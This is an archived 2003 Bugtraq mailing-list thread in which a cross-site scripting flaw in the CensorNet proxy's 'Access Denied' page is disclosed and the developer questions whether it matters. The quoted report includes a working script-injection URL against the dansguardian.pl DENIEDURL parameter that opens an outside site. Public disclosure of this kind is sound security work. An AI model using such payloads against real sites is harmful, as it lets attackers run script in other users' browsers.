Bugtraq mailing list archives
Re: CensorNet: Cross Site Scripting Vulnerability
From: "Dan Searle" <dan.searle () adelix com>
Date: Mon, 27 Oct 2003 09:18:58 -0000
Hi People, I'm Dan the main developer for CensorNet. I don't consider this issue to be a vulnerability of any kind, however, we will endeavour (for completeness) to stop people from being able to insert script into the "Access Denied" page on CensorNet. If anyone could enlighten me as to a situation where this "vulnerability" would actually become dangerous in a practical situation then please feel free. Regards, Dan... ----- Original Message ----- From: "David Wright" <wrigd006 () rbwm org> To: "Richard Maudsley" <maudr001 () rbwm org> Cc: <bugtraq () securityfocus com>; <support () adelix com>; <frenw001 () rbwm org> Sent: Saturday, October 25, 2003 4:47 PM Subject: Re: CensorNet: Cross Site Scripting Vulnerability
Richard. Sorry i havent replied. I have been ill towards the end of the week. If you get a response from Adelix (they have taken over Intrago) can you let us know. Regards Dave "Richard Maudsley" <maudr001 () rbwm org> writes:Hello, A cross site scripting vulnerability exists in the CensorNet Proxy
Service
(www.censornet.com) that allows scripting (and html) to be passed to the cgi script and displayed in the web browser. Exploit:http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-
Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.u
k")</script>
Regards, Richard MaudsleyDavid Wright Royal Borough of Windsor and Maidenhead -WAMIE (FirstClass) Technical Support Co-ordinator The Windsor Boys' School -SIMS Manager 1 Maidenhead Road, Windsor, Berkshire, SL4 5EH E-Mail: wrigd006 () rbwm org Work: 01753 716083 Fax: 01753 833186 Mobile: - ------------------------------------------------------------------- This email has been sent from the Royal Borough of Windsor and
Maidenhead LEA system, if you have cause for complaint regarding the
content of this email please contact abuse () rbwm org - -------------------------------------------------------------------
Current thread:
- CensorNet: Cross Site Scripting Vulnerability Richard Maudsley (Oct 23)
- Message not available
- Re: CensorNet: Cross Site Scripting Vulnerability Dan Searle (Oct 27)
- Re: CensorNet: Cross Site Scripting Vulnerability Richard Maudsley (Oct 27)
- Re: CensorNet: Cross Site Scripting Vulnerability Dan Searle (Oct 27)
- Message not available